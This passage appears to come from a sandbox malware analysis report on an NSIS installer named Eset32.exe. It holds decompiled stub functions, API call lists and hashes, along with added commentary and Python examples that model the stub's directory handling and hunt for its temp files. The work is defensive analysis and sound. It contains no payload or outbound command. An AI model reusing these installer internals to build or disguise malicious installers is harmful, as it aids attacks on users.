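    for n, path in find_nsis_temp_paths(SAMPLE_EVENTS):
        print(f"line {n}: {path}")
```

Because the third letter depends on the tick count at run time, a hunt keyed on the literal "nsa" seen in this sandbox run misses the other 25 prefixes; the heuristic matches the whole ns[a-z] range, and the hex-digit requirement keeps names such as nsaGGGG.tmp out.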

                                                          Control-flow Graph

                                                          control_flow_graph 477 4015bb-4015ce call 402bce call 405b28 482 4015d0-4015e3 call 405aba 477->482 483 401624-401627 477->483 491 4015e5-4015e8 482->491 492 4015fb-4015fc call 405761 482->492 485 401652-4022e2 call 401423 483->485 486 401629-401644 call 401423 call 4060f7 SetCurrentDirectoryA 483->486 499 402a5a-402a69 485->499 486->499 502 40164a-40164d 486->502 491->492 496 4015ea-4015f1 call 40577e 491->496 498 401601-401603 492->498 496->492 507 4015f3-4015f9 call 4056e4 496->507 504 401605-40160a 498->504 505 40161a-401622 498->505 502->499 509 401617 504->509 510 40160c-401615 GetFileAttributesA 504->510 505->482 505->483 507->498 509->505 510->505 510->509
                                                          C-Code - Quality: 87%
                                                          			E004015BB(char __ebx, void* __eflags) {
                                                          				void* _t13;
                                                          				int _t19;
                                                          				char _t21;
                                                          				void* _t22;
                                                          				char _t23;
                                                          				signed char _t24;
                                                          				char _t26;
                                                          				CHAR* _t28;
                                                          				char* _t32;
                                                          				void* _t33;
                                                          
                                                          				_t26 = __ebx;
                                                          				_t28 = E00402BCE(0xfffffff0);
                                                          				_t13 = E00405B28(_t28);
                                                          				_t30 = _t13;
                                                          				if(_t13 != __ebx) {
                                                          					do {
                                                          						_t32 = E00405ABA(_t30, 0x5c);
                                                          						_t21 =  *_t32;
                                                          						 *_t32 = _t26;
                                                          						 *((char*)(_t33 + 0xb)) = _t21;
                                                          						if(_t21 != _t26) {
                                                          							L5:
                                                          							_t22 = E00405761(_t28);
                                                          						} else {
                                                          							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                          							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
                                                          								goto L5;
                                                          							} else {
                                                          								_t22 = E004056E4(_t28);
                                                          							}
                                                          						}
                                                          						if(_t22 != _t26) {
                                                          							if(_t22 != 0xb7) {
                                                          								L9:
                                                          								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                          							} else {
                                                          								_t24 = GetFileAttributesA(_t28); // executed
                                                          								if((_t24 & 0x00000010) == 0) {
                                                          									goto L9;
                                                          								}
                                                          							}
                                                          						}
                                                          						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                          						 *_t32 = _t23;
                                                          						_t30 = _t32 + 1;
                                                          					} while (_t23 != _t26);
                                                          				}
                                                          				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                          					_push(0xfffffff5);
                                                          					E00401423();
                                                          				} else {
                                                          					E00401423(0xffffffe6);
                                                          					E004060F7("C:\\Users\\alfons\\AppData\\Roaming", _t28);
                                                          					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                          					if(_t19 == 0) {
                                                          						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                          					}
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
                                                          				return 0;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                            • Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming,00000000,00000000,000000F0), ref: 0040163C
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00401631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 1892508949-3453768385
                                                          • Opcode ID: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                          • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                          • Opcode Fuzzy Hash: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
                                                          • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
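E004015BB above is the stub's directory-creation routine. It walks the target path one backslash at a time, temporarily writes a NUL at each separator so the prefix up to that point becomes the argument, creates that prefix, and treats ERROR_ALREADY_EXISTS (0xb7) as success only when GetFileAttributesA reports FILE_ATTRIBUTE_DIRECTORY (0x10); every other failure is added to the counter at 0x42f4c8. When the flag tested at the end is non-zero it also records the path and calls SetCurrentDirectoryA, counting a failure there as well. The following is an added example, not code from the report or from the sample: it re-creates that loop in Python against an in-memory stand-in for the three Win32 calls, so the edge case the stub handles (an intermediate component that already exists as a file) can be exercised without Windows. FakeWin32Fs, seeded_fs, create_dir_walk and the "vendor"/"app" components are this example's own assumptions; the Roaming path is the one shown in the report.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# 0xb7 and 0x10 appear in the decompiled function; the others are standard
# Win32 values used only by the stand-in filesystem below.
ERROR_ALREADY_EXISTS = 0xB7
FILE_ATTRIBUTE_DIRECTORY = 0x10
FILE_ATTRIBUTE_NORMAL = 0x80
INVALID_FILE_ATTRIBUTES = 0xFFFFFFFF
ERROR_PATH_NOT_FOUND = 0x03


@dataclass
class FakeWin32Fs:
    """In-memory stand-in for the three Win32 calls the stub makes (constructed
    for this example). Keys are lower-cased paths, values are "dir" or "file";
    every call is recorded in `calls`."""
    entries: Dict[str, str] = field(default_factory=lambda: {"c:": "dir"})
    calls: List[str] = field(default_factory=list)

    @staticmethod
    def _key(path: str) -> str:
        return path.rstrip("\\").lower()

    def create_directory_a(self, path: str) -> int:
        """0 on success, otherwise the GetLastError() value, which is how the
        stub's helper reports the result."""
        self.calls.append(f"CreateDirectoryA({path})")
        key = self._key(path)
        if key in self.entries:
            return ERROR_ALREADY_EXISTS
        if "\\" in key and self.entries.get(key.rsplit("\\", 1)[0]) != "dir":
            return ERROR_PATH_NOT_FOUND
        self.entries[key] = "dir"
        return 0

    def get_file_attributes_a(self, path: str) -> int:
        kind = self.entries.get(self._key(path))
        if kind is None:
            return INVALID_FILE_ATTRIBUTES
        return FILE_ATTRIBUTE_DIRECTORY if kind == "dir" else FILE_ATTRIBUTE_NORMAL

    def set_current_directory_a(self, path: str) -> int:
        """Non-zero on success, 0 on failure, like the Win32 call."""
        self.calls.append(f"SetCurrentDirectoryA({path})")
        return 1 if self.entries.get(self._key(path)) == "dir" else 0


def create_dir_walk(fs: FakeWin32Fs, path: str, set_out_path: bool = False) -> int:
    """Re-creation of the decompiled loop. Returns the number of failures the
    stub would add to its error counter. `set_out_path` models the flag that
    makes the stub also call SetCurrentDirectoryA on the final path."""
    errors = 0
    # The first subcall skips the root ("C:\"), so the walk starts after it.
    pos = 3 if len(path) >= 3 and path[1] == ":" and path[2] == "\\" else 0
    while True:
        # Next backslash or end of string; the stub writes a NUL there.
        nxt = path.find("\\", pos)
        end = len(path) if nxt == -1 else nxt
        prefix = path[:end]
        if prefix:
            rc = fs.create_directory_a(prefix)
            if rc != 0:
                # ERROR_ALREADY_EXISTS only counts as success when the existing
                # entry is a directory. The stub masks bit 0x10 alone, so
                # INVALID_FILE_ATTRIBUTES (all bits set) would also pass here.
                attrs = fs.get_file_attributes_a(prefix) if rc == ERROR_ALREADY_EXISTS else 0
                if rc != ERROR_ALREADY_EXISTS or not (attrs & FILE_ATTRIBUTE_DIRECTORY):
                    errors += 1
        if nxt == -1:
            break
        pos = nxt + 1  # the separator is restored and the walk continues after it
    if set_out_path and fs.set_current_directory_a(path) == 0:
        errors += 1
    return errors


def seeded_fs(vendor_is_file: bool = False) -> FakeWin32Fs:
    """Constructed sample tree: the profile directories from the report exist;
    optionally a plain file squats the `vendor` component of the target path."""
    fs = FakeWin32Fs()
    for d in ("c:\\users", "c:\\users\\user", "c:\\users\\user\\appdata",
              "c:\\users\\user\\appdata\\roaming"):
        fs.entries[d] = "dir"
    if vendor_is_file:
        fs.entries["c:\\users\\user\\appdata\\roaming\\vendor"] = "file"
    return fs


if __name__ == "__main__":
    target = r"C:\Users\user\AppData\Roaming\vendor\app"
    print(create_dir_walk(seeded_fs(), target, set_out_path=True))
    print(create_dir_walk(seeded_fs(vendor_is_file=True), target, set_out_path=True))
```

With a clean tree the walk issues one CreateDirectoryA per component, accepts the four that already exist and creates the last two, so the error count stays zero. If the `vendor` component is a file, the stub counts the ERROR_ALREADY_EXISTS on it (attributes lack 0x10), the ERROR_PATH_NOT_FOUND on `app`, and the failed SetCurrentDirectoryA, for three errors.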

                                                          Control-flow Graph

                                                          control_flow_graph 513 405796-4057c7 CreateProcessA 514 4057d5-4057d6 513->514 515 4057c9-4057d2 CloseHandle 513->515 515->514
                                                          C-Code - Quality: 100%
                                                          			E00405796(CHAR* _a4) {
                                                          				struct _PROCESS_INFORMATION _v20;
                                                          				int _t7;
                                                          
                                                          				0x42c098->cb = 0x44;
                                                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20); // executed
                                                          				if(_t7 != 0) {
                                                          					CloseHandle(_v20.hThread);
                                                          					return _v20.hProcess;
                                                          				}
                                                          				return _t7;
                                                          			}

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • CloseHandle.KERNEL32(?), ref: 004057CC
                                                          Strings
                                                          • Error launching installer, xrefs: 004057A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                          • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                          • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 516 401389-40138e 517 4013fa-4013fc 516->517 518 401390-4013a0 517->518 519 4013fe 517->519 518->519 521 4013a2-4013a3 call 401434 518->521 520 401400-401401 519->520 523 4013a8-4013ad 521->523 524 401404-401409 523->524 525 4013af-4013b7 call 40136d 523->525 524->520 528 4013b9-4013bb 525->528 529 4013bd-4013c2 525->529 530 4013c4-4013c9 528->530 529->530 530->517 531 4013cb-4013f4 MulDiv SendMessageA 530->531 531->517
                                                          C-Code - Quality: 59%
                                                          			E00401389(signed int _a4) {
                                                          				intOrPtr* _t6;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          				signed int _t11;
                                                          				void* _t12;
                                                          				signed int _t16;
                                                          				signed int _t17;
                                                          				void* _t18;
                                                          
                                                          				_t17 = _a4;
                                                          				while(_t17 >= 0) {
                                                          					_t6 = _t17 * 0x1c +  *0x42f470;
                                                          					if( *_t6 == 1) {
                                                          						break;
                                                          					}
                                                          					_push(_t6); // executed
                                                          					_t8 = E00401434(); // executed
                                                          					if(_t8 == 0x7fffffff) {
                                                          						return 0x7fffffff;
                                                          					}
                                                          					_t10 = E0040136D(_t8);
                                                          					if(_t10 != 0) {
                                                          						_t11 = _t10 - 1;
                                                          						_t16 = _t17;
                                                          						_t17 = _t11;
                                                          						_t12 = _t11 - _t16;
                                                          					} else {
                                                          						_t12 = _t10 + 1;
                                                          						_t17 = _t17 + 1;
                                                          					}
                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                          						 *0x42ec0c =  *0x42ec0c + _t12;
                                                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageA.USER32 ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                          • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                          • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 532 406500-40651a GetModuleHandleA 533 406526-406533 GetProcAddress 532->533 534 40651c-40651d call 406492 532->534 536 406537-406539 533->536 537 406522-406524 534->537 537->533 538 406535 537->538 538->536
C-Code - Quality: 100%
// Resolves an import by table index: entry _a4 of an 8-byte table at 0x40a240
// holds {DLL name, function name}. If the DLL is not already loaded, subcall
// E00406492 loads it (GetSystemDirectoryA / wsprintfA / LoadLibraryExA, see the
// APIs list below). Imports are therefore resolved at run time rather than
// through the PE import table, which is why they do not show up in the IAT.
FARPROC E00406500(signed int _a4) {
	struct HINSTANCE__* _t5;
	CHAR* _t8;                                   // not declared by the decompiler; added here
	signed int _t10;

	_t10 = _a4 << 3;                             // 8-byte table entry
	_t8 =  *(CHAR**)(_t10 + 0x40a240);           // DLL name
	_t5 = GetModuleHandleA(_t8);                 // already loaded?
	if(_t5 != 0) {
		L2:
		return GetProcAddress(_t5,  *(CHAR**)(_t10 + 0x40a244)); // function name
	}
	_t5 = E00406492(_t8); // executed           // load the DLL from the system directory
	if(_t5 == 0) {
		return 0;
	}
	goto L2;
}

APIs
• GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
• GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
  • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
  • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
  • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
Memory Dump Source
• Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                          • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                          • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph (basic blocks as id start-end [API calls])
• 539 405c90-405cbc GetFileAttributesA CreateFileA
C-Code - Quality: 68%
// Opens a file with FILE_SHARE_READ (1), passing the file's existing attributes
// as dwFlagsAndAttributes. The cmp/sbb/and idiom that the decompiler rendered as
// "~(_t5 + 1) & _t5" yields 0 when GetFileAttributesA failed
// (INVALID_FILE_ATTRIBUTES, 0xffffffff) and the attributes themselves otherwise.
void* E00405C90(CHAR* _a4, long _a8, long _a12) {
	signed int _t5;
	void* _t6;

	_t5 = GetFileAttributesA(_a4); // executed
	/* asm("sbb ecx, ecx"): selects 0 if _t5 == 0xffffffff, else _t5 */
	_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  (_t5 != 0xffffffff) ? _t5 : 0, 0); // executed
	return _t6;
}

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405C94
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                          • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                          • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph (basic blocks as id start-end [API call]; edges as from->to)
• 540 405c6b-405c7b GetFileAttributesA
• 541 405c8a-405c8d
• 542 405c7d-405c84 SetFileAttributesA
• Edges: 540->541, 540->542, 542->541
C-Code - Quality: 100%
// Clears the read-only bit (FILE_ATTRIBUTE_READONLY, 0x1) on _a4 so the file
// can later be overwritten or deleted. Returns the attributes as queried, or
// 0xffffffff if the query failed (in which case nothing is changed). The
// decompiler typed the DWORD attribute value as signed char; mask 0xfe clears bit 0.
signed char E00405C6B(CHAR* _a4) {
	signed char _t3;
	signed char _t7;

	_t3 = GetFileAttributesA(_a4); // executed
	_t7 = _t3;
	if(_t7 != 0xffffffff) {
		SetFileAttributesA(_a4, _t3 & 0x000000fe);   // drop FILE_ATTRIBUTE_READONLY
	}
	return _t7;
}

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                          • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                          • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

Control-flow Graph (basic blocks as id start-end [API call]; edges as from->to)
• 543 405761-40576f CreateDirectoryA
• 544 405771-405773
• 545 405775 GetLastError
• 546 40577b
• Edges: 543->544, 543->545, 544->546, 545->546
C-Code - Quality: 100%
// Creates directory _a4 with default security attributes. Returns 0 on success,
// otherwise the Win32 error code from GetLastError (the caller at 0040333B
// passes a path under %LOCALAPPDATA%\Temp, see the APIs list below).
int E00405761(CHAR* _a4) {
	int _t2;

	_t2 = CreateDirectoryA(_a4, 0); // executed
	if(_t2 == 0) {
		return GetLastError();
	}
	return 0;
}

                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                          • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                          • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                          • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
// ReadFile wrapper: the _a12 argument slot is reused as the bytes-read output
// parameter, and the call only counts as success (returns 1) when the full
// requested length was read; an API failure or a short read returns 0.
int E00405D08(void* _a4, void* _a8, long _a12) {
	int _t7;
	long _t11;

	_t11 = _a12;                                         // requested length
	_t7 = ReadFile(_a4, _a8, _t11,  (LPDWORD)&_a12, 0); // executed
	if(_t7 == 0 || _t11 != _a12) {                       // failure or short read
		return 0;
	} else {
		return 1;
	}
}

                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                          • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                          • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
// WriteFile wrapper, mirror of E00405D08: _a12 is reused as the bytes-written
// output parameter, and only a complete write (all _a12 bytes) returns 1.
int E00405D37(void* _a4, void* _a8, long _a12) {
	int _t7;
	long _t11;

	_t11 = _a12;                                          // requested length
	_t7 = WriteFile(_a4, _a8, _t11,  (LPDWORD)&_a12, 0); // executed
	if(_t7 == 0 || _t11 != _a12) {                        // failure or short write
		return 0;
	} else {
		return 1;
	}
}

                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Seeks the global file handle stored at 0x40a018 to absolute offset _a4
// (dwMoveMethod 0 = FILE_BEGIN, no high-order DWORD); returns the new position.
long E00403300(long _a4) {
	long _t2;

	_t2 = SetFilePointer( *(void**)0x40a018, _a4, 0, 0); // executed
	return _t2;
}

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00401F7B() {
                                                          				void* _t8;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          				void* _t16;
                                                          				void* _t17;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          
                                                          				_t19 = E00402BCE(_t14);
                                                          				E0040521E(0xffffffeb, _t6);
                                                          				_t8 = E00405796(_t19); // executed
                                                          				_t20 = _t8;
                                                          				if(_t20 == _t14) {
                                                          					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                          				} else {
                                                          					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
                                                          						_t12 = E00406575(_t16, _t20);
                                                          						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
                                                          							if(_t12 != _t14) {
                                                          								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                          							}
                                                          						} else {
                                                          							E00406055(_t17, _t12);
                                                          						}
                                                          					}
                                                          					_push(_t20);
                                                          					CloseHandle();
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t22 - 4));
                                                          				return 0;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
